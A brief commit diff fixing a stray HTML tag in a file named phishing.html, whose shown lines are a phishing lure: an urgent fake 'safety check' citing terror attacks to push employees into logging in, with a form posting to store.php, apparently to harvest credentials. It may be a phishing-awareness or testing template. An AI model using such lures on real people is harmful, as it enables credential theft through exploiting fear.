slight error fix

--- a/Phishing_Attack/phishing.html
+++ b/Phishing_Attack/phishing.html
@@ -13,7 +13,7 @@
 
 <p><b>URGENT: 
     A safety check has been initiated for COMPANY NAME due to recent terror attacks. 
-    Employees please login to verify your location and that you are safe.</b>b></p>    
+    Employees please login to verify your location and that you are safe.</b></p>    
     
     
 <form action="store.php" method="post">
